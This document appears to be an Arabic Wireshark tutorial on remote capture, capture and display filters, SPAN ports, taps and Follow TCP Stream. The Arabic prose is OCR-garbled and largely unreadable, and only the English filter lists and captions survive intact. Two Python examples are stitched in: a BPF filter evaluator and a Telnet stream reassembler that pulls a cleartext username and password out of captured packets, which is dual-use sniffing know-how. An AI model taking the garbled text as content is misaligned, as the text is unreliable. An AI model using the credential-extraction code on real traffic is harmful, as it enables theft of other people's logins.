j*j 'rpcapd.exe lUAj WinPcap .(Jj^j ( <j > ^^ t WinPcap axj jo LU^VI cjlj^a ^l^k^l U^l c^jSaj 

.WinPcap winPcap rpcapd.exe ^ 







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.WinPcap J^i <|^t rpcaped.exe g-^j^l ^ jj^j ls* A^aliJI aia 4jajal* 
[authentication] 71 ajL& ^^Luj 7 UjI Jl jj^j -n u^) ^ c> Jj^j ( J^ [rpcapd-n] fjfc 

Capture | Interfaces | Options | Manage Interfaces | Remote Interfaces | Add

.rpcap [rpcap daemon] JL-a37l ^ill < <j > ^^ t Jl^JI rpcapd [-1] ^l^i^l ,c*l jj! j 

irpCapd (j^ -W£Sl7l £c-aUjJ £x» ^^klLoixJl <xjj^a3l 

C:\>rpcapd [-b <address>] [-p <port>] [-6] [-l <host_list>] [-a <host,port>] [-n] [-v] [-d] [-s <file>] [-f <file>]



(Deal with TONS of Traffic) JJ^ ^ J <> fr* 6^ ^ 4- 

jjc. cilLlaJ (Jjc^j (_^i3l j AjuAi £JJJ c aLa till ciljjjj ciljUjjjl jll Jc JjJ>Jl (J-^ (LfcL^ ^ g ^ *j t^UaL^Jl t— iLuiuij^all <J^.ta 

,Cljl£jjaJl ^j-Q J J^ cffi^*^ 4_ijl£^l (jLajJal JjJ-aJl ^^P" *J^I dl7Ax-<Jl <J>Ajtj3l ^LlHj L_fl jjoj .LaLaJ 

Jc ^<Jl (J^axJ ^jj^aJ ^AkjjauJl (j-G t . llSaj ^aJ ^ j JJ^Jl Jalaullj t Aaj L_fl jjuoS tdlj Jj7l ^Aj^aJ £-IaJ (j-a un ^^JjoiaII <jl£ li] 

jll JalililU C-LoS <j7l gajli sJaJ ciL (j^aLkll ~ l^Lu^l J^S (j' t **\^J J^ -^-^71 J j.<U.>.nj L_fl jjoj .dujJjVI ^JjuJ 

J^Uli c^jS lit 

^>JI ^ JJii JjjL ^ .(Capture Filters) JalialVI jj^i ^l^ki^V t^U^Vl J^ai c> s^l j ^ c> j^ll t° J-^M 



bC >I ax^ Jalisll LISjIVI Jl jhilW .ajjouj Jl ^>JI cj Jj q\ t*ll (jimj Aa (Capture Filters) 1*12271 J^ ^l.^lmt 

(Capture to a File Set) ^ Jalfill OaJ Jal£NI aJ^p • 

,tiljUjjjj| jll a I laJLujI j 1 g > ^>^q 0^-^ j3l djliLJI J cJ^^ -^J File set .(File set) -^-^ L ^^)^ -^^lll a j£ (iljLujjjl J\ 

File | File Set | List Files

Jalisll UajJ Jll(Interface) Jl s^^h £ Options h^j ^J*^^ <^^l J s^^JI Capture c3J J^ 

^a^j ^ . Jtill J£j^JI J jjj-g U£ ^Capture File(s) ^ J (File set) ( aLJ] L_aLJI ^1 j jLaiJI J^^j . jj>^l ^ 

^JjLJI l^LJI *L^V j^^JI j Use multiple files s-^h 
jl ^Haajuj liUi jll jjjIj^ .jAaJ ^3 .pcapng c3j >>i *^j 100 MB * flLall ^ j*^* ^UijU tiljUijjl jll ^Jj jjoj 4 11a U3Hg J 



[Figure: Capture Options dialog. Capture File(s): a .pcapng file name, "Use multiple files" checked, "Next file every 100 megabyte(s)", "Ring buffer with", "Stop capture after"; display options "Update list of packets in real time", "Hide capture info dialog"; name resolution options for MAC, network and transport names. Caption: "Set Wireshark to capture to file sets when you are going to capture over a long time"]
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Cascade Pilot • 

http://www.riverbed.com : j^-a^ll 

>La»a.l (JajuojI l^Jt-jjoi jj ^aJj <£jjaJl Cjlc Jjuj S^Lj J ^JC J^lj J^l UJ^ ^ (J j> aaJl ^^jll £f^l ClAiLa (jl 2007 ^ a 1 

.cAiLall £>i& I^I^jjojV aI&^g Stal SLa^ ^ n ciljLujjjl jll /^asLLJI > n jll j > *al V. 
.Cascade Pilot ls^'j g^iJI lWI WinPcap <*jt^> <Loris Degioanni <2009 ^ J 

^ (j£^2i Ls i^. J^\£jjj ;tiljUijj| jll J *^ jiLJI jjjliiillj ^ j^jjil <*-il j^S j^jjj tSjjuSlt £n&\ dial* ^Jlsu Cascade Pilot 

1 ^^ilojl ; j^VI jl^VI yi 6 cJULail Jc .s £±2ll CjUL J^UjII Jc s j^3l ^ Cascade Pilot's dt c> j 
tiljLujjjl jll (jli t^jjjlj ^cl jl j jl ^3^x11 jlila AiLjalj ^ j£j Sj* <J£ .tiljlujjjl jll (j* sIjjLUljc. 1,3 t ^jA-* 52j Aija^ 

(j* IP ci ilibLa^ o^j^ lSj^ v ^ 'Cascade Pilot J .l^l^l JLaxloa^U LaJL^a jjc. ^f^al tiljUijjl jll t aLall Jj^vi s^lcb ^jIj 




Cascade Pilot .^ajjall ^jjjII CjliLi ^ <J*l*jll ^ l^a. s^ia. c loJ liljUijjl jll .a^UJI ^ jjujjI! ^Uj j) & jj^UII (Jjjji^ j ^aacVI 

jdj (J^l£jj] j^VI ^fi^l daliLa ^ cJ-**^ pljuljj 

.cJla^ 6J li^U Cascade Pilot ^l^-U ^ 4 (MB 
(Reduce the Amount of Traffic You have to Work With) Ifck J^*U jj^aJ) 4£j^ <> JJiU) ^ 

.JalSSlVI ^UjI S J^lillj ^la . all 

(jAs«-xi ^ ^gjujLoJJ jl (j^J V (iljLujjjl jll jl ^aj ^3 tl^a. jxjuLq ^^La. C5 ic jl <juajoj^<JI Ja.b JJJ^ ^J^- JalSSl v ; laj jl£ lil 

_ jj^JI A^ja. 

jjj^J) SljU-4 djUi jjI j.1 ^jMnn V UHp L-Liiil • 

-dumpcap.exe c> jjj^^ ^j^j^'j 3 ' .jj^ iali^V dumpcap.exe 3^Hi ^J^^^ 

jj^Jl ^j^- 4-ia>j >n V tiSjLuSjjt jll jl v . ujuoj ^a.jVI ^^-Ic.) -LalijlVI 4jUr> e-Liil jjj-<JI ^j^- ^ c^^HJ ^ ^ ^ dumpcap 
.Ja^jVl ^j^l ^ ciljUijjIjll 31aJl iajj^ ^ lJj^ "Dropped: x" 4(aj51S a^j^j dumpcap 
V .aL&L Previous Segment j ACKed Lost Segment c> ^^1 ^ c# j 1 ^ ^ o- 3 ^^ <ta ^ a 4 C^ ^ ^ 

J JjS l^inks ^Ij Lliavi cUI ^U3I J1JJI .(Capture Filter) ilSslVI j^^i JIUI c^jll ja 11a 

^ jaJl (jl^a L-Uaal JjJaal ^J^aja ciL^ 64ia.jJl £>i& ^ JalSSlVI 6j2lfl J-al jC> (J^iaJ JiLa. (> .JalSSlVI ^ jaJl J^jj 

.(dropped packets) 
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libpcap/WtnPcap 
[capture filter] 



Use a capture 
filter to reduce 
the number of 
packets that get 
passed up to the 
Capture Engine 



network 



A£j* SIjU^a <U1aj V Spanned port • 

^jj^al hi cj^jjoj Lua jiailU .1^ J jxAa Spanned port ^^-^ ^Jc- JjlLJI ^j^jjoJI ^> LqaIo L-kajl ^— U' 

^ j) ^^W^ 1 j JL^jVL Ci*a j .h^ J Jj^a ^ spanned a physical switch port 

li^i ^jijjjjjaill Spanned port - jaJLuii £±i\j 1^ a1 jxjuLq 4£jJJI ci±jl£ hta .(oLaJVI cAAac < . ujmj lLuLUljc. 2 £-al jll 
.oversubscription £^jll I^a c^^J -f J*^' lP 3 *^ ^' t> o^j^ 1^' 1 <^j lP 3 ^ cS^jd ^j^ 

ACKed u>* ^aL&j jjoj tSbli tcilh ^ V^j o^Jj .^JLaJI -^j^ Dropped: x ^j^A^I j^ <3X*JI ^£ 

t*Ui j ^ jaJI (> (g\ JalJ <j1 Jl jjAj ^ j^l jll jj^ cj! Previous Segment j Lost Segment 

.tiljLujjjl jll ^1 ^ o-^j^l 
lU j* Full-duplex tap . jj^l ^£ -^^1 ^ ^ j jj) jj^ Jl ^Ijsj . Jaxj ^ o^j^l span capture *^l 
.TAP J*- -UiftVI jj^li 6 j^a o^xj ^ J I^Loj Intelligent Taps .J^l J^l ^ > ^ <4^l ^ ^ 




[Figure caption: If a port-spanned switch can't keep up, consider using a full-duplex tap]



f (Capture Filter)^liUVl jfiti o^jfi UILoj uL£ • 
Options j^l c>j *^l Capture <ija j^I t> ^ (Capture Filter) JalitiVI 

JalislVI jj^a AlaJ ^ j^jj ^ill j Capture Filter c^*^ L - J ^ ^ < — * j ^ ^ * >1 a * j 

.^U3I Jlxill ^ jj^a U£ Edit Interface Settings SiaU ^ ^j^j U j ^ ^ j j <-J^ ^ > ^ > ^>^^l i 



[Figure caption: Double-click anywhere on the desired interface line to open the Edit Interface Settings window]




£±& hi B t*L <^UJI LUttl VI jj^i ^\\<*A\ aS^l ^ill jlSJI ^ill j ^Edit Interface Settings siaU ^Ull Jiill 
BPF <i-i^ail ^^klaaj tiljUijjl jll .Capture Filter area AiSaio ^ aisSI <LLauj oA* a,A\\\ JalislVI jj^i 5juj^a 

.JalSslVI dumpcap cia <> Jj^is h^ .(Berkeley Packet Filtering) 



V -S^Vl jJ^la jl pi ^x^Jl Sjgkll jjJIj .ialSaVI JJ^a ^U^L <4 g nn1 <jl^3l ^UjI AjiLkll ^ ^^Sasu ^jUjjI jll jl jJVt j^J 

,^jia^3L!l jii!>la ^J-dlc AjUj^ C-LaAaajqal L^JJ jl ^ » ila ^ Uaa^ ^^^ic ^jlia JaliiilVI JJ^a ^jli t^a^jVI (^^ic m A aJl t ^11 1 g i£ <lj 
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| Ed il Interface Setfngf 



■-■if 



Ct»ft-urt 

Interface Ffeafe* PC* FE f«™iyO>*li9Uer ^Devwe'.NPF^efraFf CQFF79 -EEF F3MASS9F: 




http://wiki.wireshark.org/CaptureFilters -M jll SjLjj ^^^^ JalSslVI jj^li ^ CjUjkJI <> 

(MAC / IP) L^j^it lhU J^ jj>*« ^ • 

i jll A\h\ uiVl c _^a MAC ( IPu^j^* C>* ^ * jl) O^*-* IP L)' Jjj L>* JJJ - ^ -^-^ 

<KL> Jc j£ j£\ 

UjldLJ ^jj Jll staVt ^ill j <dumpcap ^JajJjj BPF 4 *j > ^ l ^vi >. n (JatftlVI j^) Capture filters 

11a IS^V 5j J l>jj j^i ^j^j J^j '(Display Filter) jfi^* Jat£i3V ^3 jL^jjIjII 4_LjujIjj 

.BPF <*^j dumpcap ^->lj^ :LkJjj j^&s v (Display Filter) lP 3 ^ .^JA^'jM 4_£L 

(Jjqjt^^l IP (jl -lat&lYI lW-C- ^l^klajl J j^flJ 4 Jj^al jjlt jjLjJaxll ^ ^jAslSI ^jj L-Ll^ (jl^-o J ialajlVI du£ lij 

.l^lil^J ^JjJ jll JJJ - ^ ^^P" L - J ^ 

.mask ^l.^nul j) CIDR ^-y^ Al.vViml cilj£ aj t^jUxJI ^ <c ^ ^ jl ^j^- Jalislt ajjj LqaIc- 



c±& lij Ul .multicastj broadcast ^£ Jl ^-*^YI ^ J^U. a£jj^I Jc^ u j^^ I CP ji^ u' 
Capture filters . Jlj^' ^ ip6j ip JalialVI j^la ^^ki^j j^i 4 jj^JI <> IPv6 jl^yi ji IP o$P*i ^ 

cjI j^VI -iajj^ Edit Capture Filters jjM j^^ .JalSsSVI jj^i c> <^al j^l ^ >^ u^^u ^J-^j^ ^ '.^ 

■ http://wiki.wireshark.org/SampleCaptures -M jil ^ J ^ ^ lS Jati^VI t> AiLjal ^V^^j ,t*S jUi jj! jll 

/ LjJa^SI MAC LS^\ ^^^1 pL^OJ 4t LljJa^SI J-d jl IPv6 J IPv4 U^J^ JJ>^^ Jali^ll ^JjJ U^JC- 

,L_fl^Jl L_flJjJa>Jl ASliA (JJ^ij Jc (il^ J^-J (j-a ^Slj cillil t^Jj^iall <J jia Jc JJjl^l ^3^'^ (J^ L>^ W%f^J 1VIAC U^JJJ ^^>^ ^ 







.t*L o-aUJI ci^JI d;: u<;ti V UDP ji TCP ^ Jj bUU JalislVI J^Lk 
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huu jjjkilt l_Lij*j J] £^ _ jjJaili ^ l_a j^h V (Berkeley Packet Filtering format) JaliilVI jfiti 
http://wiki.wireshark.org/CaptureFilters 

- port 53: Capture UDP/TCP traffic to or from port 53 (typically DNS traffic)

- not port 53: Capture all traffic except UDP/TCP traffic to or from port 53

- port 80: Capture UDP/TCP traffic to or from port 80 (typically HTTP traffic)

- udp port 67: Capture UDP traffic to or from port 67 (typically DHCP traffic)

- tcp port 21: Capture TCP traffic to or from port 21 (typically the FTP command channel)

- portrange 1-80: Capture UDP/TCP traffic to or from ports 1 through 80

- tcp portrange 1-80: Capture TCP traffic to or from ports 1 through 80

(BPF keywords are case sensitive and lowercase: "Port 53" is a syntax error, "port 53" is the filter.)

,i>li^l (jjU* j& Lo£ 'logical operator 1 a$ \n ^^11 <J!La tAJtlLa iat-L<J! t * j> ^^>^ -^-^ La,ijc. 

- port 20 or port 21: Capture all UDP/TCP traffic to or from port 20 or port 21 (typically the FTP data and command ports)

- host 10.3.1.1 and port 80: Capture UDP/TCP traffic to or from port 80 that is being sent to or from 10.3.1.1

- host 10.3.1.1 and not port 80: Capture UDP/TCP traffic to or from 10.3.1.1 except traffic to or from port 80

- udp src port 68 and udp dst port 67: Capture all UDP traffic from port 68 to port 67 (typically traffic sent from a DHCP client to a DHCP server)

- udp src port 67 and udp dst port 68: Capture all UDP traffic from port 67 to port 68 (typically traffic sent from a DHCP server to a DHCP client)

e I^L,u ^ ,TCP J-M ^ specific ASCII string JS* j£« :UU ^ li) ^ ^ 

(http://www.wireshark.org/tools/string-cf.html ) Wireshark's String-Matching Capture Filter Generator 
.0 ^1 jVI TCP f A* GET J 'HTTP GET -W^V ±& ^ J li! < ^ 

sj±^4 icmp jj^ ^ iaisai • 

t>Vl jt *bVl J Cj^II^ djj^ ^jc ajjSIj* 4^ Jj^Ajj* Internet Control Messaging Protocol (ICMP) 

JSaJI J] SjL^(Offset) ^1 j] r v ^" ,; ^ 6 ^ ^ .ICMP -XaUBJl jSte ^> jpJI JSja dL^I Jj^?J1 o^j 

.ICMP ^IjSI g&j* j* 1 ^IjVlj ICMP c> J^l> 0 ^IJV 1 .ICMP ^> 

- icmp: Capture all ICMP packets.

- icmp[0]=8: Capture all ICMP Type 8 (Echo Request) packets.

- icmp[0]=17: Capture all ICMP Type 17 (Address Mask Request) packets.

- icmp[0]=8 or icmp[0]=0: Capture all ICMP Type 8 (Echo Request) packets or ICMP Type 0 (Echo Reply) packets.

- icmp[0]=3 and not icmp[1]=4: Capture all ICMP Type 3 (Destination Unreachable) packets except for ICMP Type 3/Code 4 (Fragmentation Needed and Don't Fragment was Set) packets.
j^jj ICMP c - ^ s-ic. jj ^jl tdjj J^i^ A\ ^jSI j ^not icmp JJisIVI ^ji L1j\ ^ ^c. jll ^^ic 
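Both filter lists above (the port and DHCP filters, and the ICMP offset filters) describe what BPF tests in the packet bytes. The following added example, not code from the page or from libpcap, makes that concrete: a small IPv4 parser that pulls out the same fields the port and icmp[] primitives look at, one predicate per filter expression, and a set of constructed packets to run them against. Packets are built without the Ethernet header, and checksums are left zero, which BPF does not check anyway.

```python
"""What the BPF capture filters on this page actually test, evaluated by
hand on raw IPv4 packets.  Added example: a tiny parser plus predicates
that mirror `port 53`, `udp src port 68 and udp dst port 67`,
`icmp[0]=8` and `icmp[0]=3 and not icmp[1]=4`.  Sample packets are
constructed inline."""
import struct
from collections import namedtuple

Pkt = namedtuple("Pkt", "proto src_port dst_port icmp_type icmp_code")


def parse_ipv4(pkt):
    """Return the fields BPF port/icmp primitives look at.  IHL is the low
    nibble of byte 0, protocol is byte 9; ports are the first four bytes
    of TCP/UDP; icmp[0] and icmp[1] are the ICMP type and code."""
    ihl = (pkt[0] & 0x0F) * 4
    proto = pkt[9]
    l4 = pkt[ihl:]
    if proto in (6, 17):                          # TCP or UDP
        sport, dport = struct.unpack_from("!HH", l4, 0)
        return Pkt(proto, sport, dport, None, None)
    if proto == 1:                                # ICMP
        return Pkt(proto, None, None, l4[0], l4[1])
    return Pkt(proto, None, None, None, None)


def is_l4_port(p, port):
    """`port N` means TCP or UDP, source or destination."""
    return p.proto in (6, 17) and port in (p.src_port, p.dst_port)


# Each filter expression as a predicate over the parsed packet.  Note that
# `not port 53` also admits packets that have no ports at all (ICMP).
FILTERS = {
    "port 53": lambda p: is_l4_port(p, 53),
    "not port 53": lambda p: not is_l4_port(p, 53),
    "tcp port 80": lambda p: p.proto == 6 and 80 in (p.src_port, p.dst_port),
    "portrange 1-80": lambda p: p.proto in (6, 17)
                                and any(1 <= x <= 80 for x in (p.src_port, p.dst_port)),
    "udp src port 68 and udp dst port 67": lambda p: p.proto == 17
                                                     and p.src_port == 68 and p.dst_port == 67,
    "icmp[0]=8": lambda p: p.proto == 1 and p.icmp_type == 8,
    "icmp[0]=3 and not icmp[1]=4": lambda p: p.proto == 1 and p.icmp_type == 3
                                             and p.icmp_code != 4,
}


def build_ipv4(proto, payload):
    """Minimal IPv4 header (IHL=5, no options, checksum zero) + payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      bytes([10, 1, 1, 1]), bytes([10, 1, 1, 2]))
    return hdr + payload


def l4_header(sport, dport):
    """First four bytes of a TCP or UDP header: source and destination port."""
    return struct.pack("!HH", sport, dport) + b"\x00" * 16


# Constructed sample packets.
SAMPLES = {
    "dns query":        build_ipv4(17, l4_header(51000, 53)),
    "http get":         build_ipv4(6, l4_header(40000, 80)),
    "dhcp discover":    build_ipv4(17, l4_header(68, 67)),
    "dhcp offer":       build_ipv4(17, l4_header(67, 68)),
    "echo request":     build_ipv4(1, bytes([8, 0]) + b"\x00" * 6),
    "frag needed":      build_ipv4(1, bytes([3, 4]) + b"\x00" * 6),
    "host unreachable": build_ipv4(1, bytes([3, 1]) + b"\x00" * 6),
}


def matches(filter_expr):
    """Names of the sample packets a given capture filter would let through."""
    pred = FILTERS[filter_expr]
    return [name for name, raw in SAMPLES.items() if pred(parse_ipv4(raw))]


if __name__ == "__main__":
    for expr in FILTERS:
        print("%-36s -> %s" % (expr, ", ".join(matches(expr))))
```

Two things the table entries do not say out loud fall out of running this: `port 53` matches TCP as well as UDP (zone transfers, large responses), and `not port 53` keeps every ICMP packet, because a packet with no ports cannot match the `port` primitive it negates.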
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Follow TCP Stream in Wireshark • 

s^&Luid a) staYl ^ ."Follow tcp stream" ^ jj*ua3I TCP l>* ^-^W^ l£j£ ^ ^j^j^ 

CjUUJI jl diilill J jjj^I CjUK *j 11a ^l^kiojl .(Application Layer) ciiLLfkiil <LJa Ji* (j^jUl <jj^ tcp data 

Follow tcp stream ^ i>j ^ JL-a3VI/ jt£ll <> ^>J1 i^lS ^ TCP 'TCP ^jj 

'EBCDIC 'ASCII Sjj^ 1 cs* W* 3 ^' *5 cMjJI ^jj cill ^ojoij -Uli ^ t^j U£ JmLn q^I J jliill ^ jl^ 

.Raw formats 'C Arrays 'HEX Dump 



[Figure: Follow TCP Stream on a Telnet session between 192.168.0.1 and 192.168.0.2. The packet list shows the TCP handshake and the Telnet data segments; the stream window shows the login banner, the login: prompt, the password typed by the user and the following shell session (a /sbin/ping www.yahoo.com with replies from 204.71.200.67), all in cleartext. Caption: "Password revealed in TCP Stream". The dialog offers ASCII, EBCDIC, Hex Dump, C Arrays and Raw views]
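Follow TCP Stream works because Wireshark reassembles each direction of the connection in sequence-number order and shows the two byte streams side by side, so a cleartext protocol like Telnet leaks the password exactly as the user typed it. The following is an added example, not code from the page or from Wireshark: the same reassembly done by hand on constructed IPv4/TCP packets (Telnet option negotiation omitted), tolerating an out-of-order segment and a retransmission, and then pulling the username and password out of the client's stream.

```python
"""Follow TCP Stream by hand: reassemble both directions of a TCP
conversation from raw IPv4/TCP packets and pull the credentials out of
the cleartext, as the Wireshark dialog does for Telnet.  Added example;
the conversation is constructed, including one out-of-order segment and
one retransmission, which real captures contain all the time."""
import struct
from collections import defaultdict

CLIENT = bytes([192, 168, 0, 2])
SERVER = bytes([192, 168, 0, 1])


def tcp_segment(src, dst, sport, dport, seq, payload):
    """IPv4 packet carrying a TCP segment (PSH/ACK, no options, checksums
    left zero).  src/dst are 4-byte addresses."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0, src, dst)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0)
    return ip + tcp + payload


def parse_tcp(pkt):
    """Return ((src, sport), (dst, dport), seq, payload) of an IPv4/TCP packet."""
    ihl = (pkt[0] & 0x0F) * 4
    src, dst = pkt[12:16], pkt[16:20]
    sport, dport, seq = struct.unpack_from("!HHI", pkt, ihl)
    data_off = (pkt[ihl + 12] >> 4) * 4
    return (src, sport), (dst, dport), seq, pkt[ihl + data_off:]


def follow_tcp_stream(packets):
    """Reassemble each direction of the stream.  Segments are ordered by
    sequence number, so arrival order does not matter; a segment whose
    data was already seen (retransmission) is dropped or trimmed.
    Returns {(src, sport, dst, dport): bytes}."""
    by_dir = defaultdict(dict)
    for pkt in packets:
        (src, sport), (dst, dport), seq, data = parse_tcp(pkt)
        if data:
            by_dir[(src, sport, dst, dport)].setdefault(seq, data)
    streams = {}
    for key, segs in by_dir.items():
        buf, expected = bytearray(), None
        for seq in sorted(segs):
            data = segs[seq]
            end = seq + len(data)
            if expected is not None and seq < expected:
                data = data[expected - seq:]          # overlapping retransmission
            buf += data
            expected = end if expected is None else max(expected, end)
        streams[key] = bytes(buf)
    return streams


def extract_credentials(streams):
    """Take the bytes the client sent in answer to the server's 'login:'
    and 'Password:' prompts.  Telnet sends them in the clear, one
    keystroke per segment, which is exactly what the dialog reveals."""
    s2c = next(data for key, data in streams.items() if key[1] == 23)
    c2s = next(data for key, data in streams.items() if key[3] == 23)
    if b"login:" not in s2c or b"Password:" not in s2c:
        return None
    answers = c2s.split(b"\r\n")
    return {"username": answers[0].decode(), "password": answers[1].decode()}


# Constructed Telnet session: the server echoes the username but not the
# password; "3" arrives before "s" and "c" is sent twice.
PACKETS = [
    tcp_segment(SERVER, CLIENT, 23, 1190, 1000, b"login: "),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5000, b"b"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5001, b"o"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5002, b"b"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5003, b"\r\n"),
    tcp_segment(SERVER, CLIENT, 23, 1190, 1007, b"bob\r\nPassword: "),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5006, b"3"),      # out of order
    tcp_segment(CLIENT, SERVER, 1190, 23, 5005, b"s"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5007, b"c"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5007, b"c"),      # retransmission
    tcp_segment(CLIENT, SERVER, 1190, 23, 5008, b"r"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5009, b"e"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5010, b"t"),
    tcp_segment(CLIENT, SERVER, 1190, 23, 5011, b"\r\n"),
    tcp_segment(SERVER, CLIENT, 23, 1190, 1022, b"\r\nLast login: Thu Nov 17\r\n$ "),
]


def recovered_credentials(packets=PACKETS):
    """Credentials recovered from a packet list, as a sniffer would see them."""
    return extract_credentials(follow_tcp_stream(packets))


if __name__ == "__main__":
    for key, data in follow_tcp_stream(PACKETS).items():
        print("%s:%d -> %s:%d  %r" % (".".join(map(str, key[0])), key[1],
                                     ".".join(map(str, key[2])), key[3], data))
    print(recovered_credentials())
```

The per-keystroke segments are why the password never appears as one readable packet in the packet list: only the reassembled stream shows it, which is the whole value of the dialog, and the whole argument against cleartext protocols on any link a tap or SPAN port can reach.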



((jaajxJ) jj^i Apply Display Filters to Focus on Specific Traffic 

o^ljS t :< ua ,(il3i C5 ic <£L<»V1 ^1 j& ^r^j^ JJ^y^ ^^>^ .^^^ cs"^ L$ jfi-^ 1 ^ CjlkifLlill - gaJ aLjujj JjJaal ^jLi^Vl 

V t^^kl aj^U ^j-<i ^^>^- cJ j 1 ^ frill <-U*^ ^ y^c- o^j 6 j^^^ ^ (Web Log)^-^^ ^^L^. dj^l^jaj 

Ajl*. jlill £yz Ly^l ^ J ' 6 ^ cJ jV s-Aj Ajc L_lA JJ j oA ^ J^-laJ ^3 tiljLoijjl jll # ^j^J laJjJallj J jg hj / . V^J 

[Figure: the Display Filter Area below the main toolbar. Filter: ip.addr==10.1.1.1, with the Expression..., Clear, Apply and Save buttons to its right]



, (^^joijj jl! CjI j^VI iaJjjai) ^pajaJl jJ^j/Cjl ^ ***'J^ ^Laijjj jjj^Jj ^jiajc aj j jl! 1 A^b J^Li. j-o m \ 

.((j^jxJI jj^li jjj^j j lP 3 ^ l^j^-I ^j^ 3 ) o^^I jj .2 

.(HxkJl (jC t ftjuj^llj ^liljll JIa£VI j ^ 1 ^alj) (J^J^I J^^ (J^J^ ^alo .3 

jxJI jj^li ^UijV tiL c_iAij ^1 Expression .5 
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7 
8 
9 



(Use Proper Display Filter Syntax) ^ li ^ t lhj^I 5^ ^l^^l • 




^jl^ ^ e ^iu£i (Display Filter) jBli jli <BPF II (Capture Filter) JJSsJV! j£W jlj^ ^ 
jj^la \^ a a jisi tiljUijjl jll jii^ii eUiLoL .(Wireshark proprietary format) ^j^j^ 



Application Filters

- arp: Displays all ARP traffic including gratuitous ARPs, ARP requests, and ARP replies

- ip: Displays all IPv4 traffic including packets that have IPv4 headers embedded in them (such as ICMP destination unreachable packets that return the incoming IPv4 header after the ICMP header)

- ipv6: Displays all IPv6 traffic including IPv4 packets that have IPv6 headers embedded in them, such as 6to4, Teredo, and ISATAP traffic

- tcp: Displays all TCP-based communications

- bootp: Displays all DHCP traffic (which is based on BOOTP). In Wireshark 3.0 and later the dissector is named dhcp, so the filter is dhcp there

- dns: Displays all DNS traffic including TCP-based zone transfers and the standard UDP-based DNS requests and responses

- tftp: Displays all TFTP (Trivial File Transfer Protocol) traffic

- http: Displays all HTTP commands, responses and data transfer packets, but does not display the TCP handshake packets, TCP ACK packets or TCP connection teardown packets

- icmp: Displays all ICMP traffic

Field Existence Filters

- bootp.option.hostname: Displays all DHCP traffic that contains a host name (dhcp.option.hostname in Wireshark 3.0 and later)

- http.host: Displays all HTTP packets that have the HTTP host name field. This packet is sent by clients when they send a request to a web server

- ftp.request.command: Displays all FTP traffic that contains a command, such as the USER, PASS, or RETR commands

Characteristic Filters

- tcp.analysis.flags: Displays all packets that have any of the TCP analysis flags associated with them; this includes indications of packet loss, retransmissions, or zero window conditions

- tcp.analysis.zero_window: Displays packets that are flagged to indicate the sender has run out of receive buffer space

https://www.facebook.com/tibea2004

jj^li jJ^ BPF (Jjninlt ^^klaiJ JaliSlVI jffllfl .JaliSlVI jfiti fl>lkU jA jia jsJl jJ^li J ^JC lc jJjuj Lk^JI 



.^Ij Cjij ^! jjuj a^. ^^ic ^jiajc j^lsj Jaliiill jiila I^js l!-^ <^i^ <SJalt Cj!^<JI ^> ^ <ilU& .proprietary a *_i> ^\ ~ laJLuxi ^pa^xJI 

-L pajc Jalijl! jilfl <jI£ 5-1 jjuj ^ C5 ic I^I^IujI (j^j icmp j ip < JUall c^c- 

£fll jJl jjJ -SajljjJ! 4i^>x-G Ajjj LoAlc JjJjSII jSlall jA I^A .CljjjjjVI £tij^aJ 3 mU ^ DNS JJ>* JSjuJI ^ 

DNS ^— ilj^ uilujl ^ <L^alc t . ujujj www.wireshark.org (_>^I^>*1uj1 <jl ^1 1 b£ a\ t jiilill 11a ^hviml .ciijjiijy 1 a£jjuj 



[Figure: http-browse101.pcapng with the display filter dns applied. The packet list shows standard A and AAAA queries (www.wireshark.org among others) from 24.6.173.220 to 75.75.75.75 and the matching responses; the status bar reports 3011 packets in the file and the number displayed after filtering, Profile: Default]



(Use the Display Filter Error Detection Mechanism) >^ f Uaii <-LSS ^Jl ^l^l^l 

jj^li Alklo ^ ^^J-<^ tiljUjjjjl jll laJ L_S jjujS ^dnS DNS ClLa3 lil AjLaJ AjujIjuj^. ^jia^xJl jii^li jl j^ii 

. (logic test)(3^^^ V tiljLujjjl jl! .Ijia. ^ ^jSl j t^j^ >^ 

(Field name) Jji^t f Uyii 

JaaJ! AlaJ t Jia. ^xjujI Ai^x-<J .(http.hOSt J J^S^ 5-UujjI (^ic 4_ajUs (JjSj l^jjflaJJ ^ j£j c_fl jjuj ( ^j3I ^pa^xJl Jj!>li (j* ^J^xJl ^ jSj 

t5 lc. ji^U ^ jSj ^ jjuj 6 JUaII 11a -C5^^^ cJ^-^ ^ i (Status Bar)^-^ -^j^ ^-^jj o^j^ ^-^^ 

Request Method ^ Je. jfcll . f >ll J^Uj s > ^ HTTP 

.http.requestmethod l^ 1 liA c^ 1 (Status Bar)^JI u u <**>lt c> HTTP gJaLJI 



[Figure: http-browse101.pcapng, frame 10, GET / HTTP/1.1 from 24.6.173.220 to 174.137.42.75. The Request Method line is selected in the packet details pane under Hypertext Transfer Protocol, and the status bar shows the field name for it]



. JSaJI liA lsj^ j£\ ^>J^ AilS o^j*^ o^j*l\ jfi^ http.requestmethod lp^ 

^ 101 f j^J^ 2011 c# J 1 ^ -^J^ ^ liA 1 iqiVi 

.UjJ jSlill jjLks 
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JjLojjj <HTTP lUjj V s-ujSI ^1 ja. .HTTP c> ^ j-^UtJI U -j^- jSla jaju 11a 

.HTTP J^j 




[Figure: the display filter http.request.method applied; only frames carrying an HTTP request remain in the packet list. Status bar: HTTP Request Method (http.request.method), Packets: 3011, Profile: Default]



(Use Auto-Complete to Build Display Filters) <J*j& jfita *U£ J^V 1 f 1 -^ 1 • 
http. 'M^ ^ . J^t ^iaU ^iL ciljUijjIjll qM http.request.method 

Iajj ^jJI jj^UII c5j2 l_a jjoia http. request. Aic .^aill l^j Iajj ^jl ^j^uJI ^pa^JI j ^aU^ij t(<iaij cilli La^j 




[Figure: after typing http.request. in the filter field the auto-complete list offers the fields that begin with that prefix, e.g. http.request.full_uri, http.request.method, http.request.uri, http.request.version]



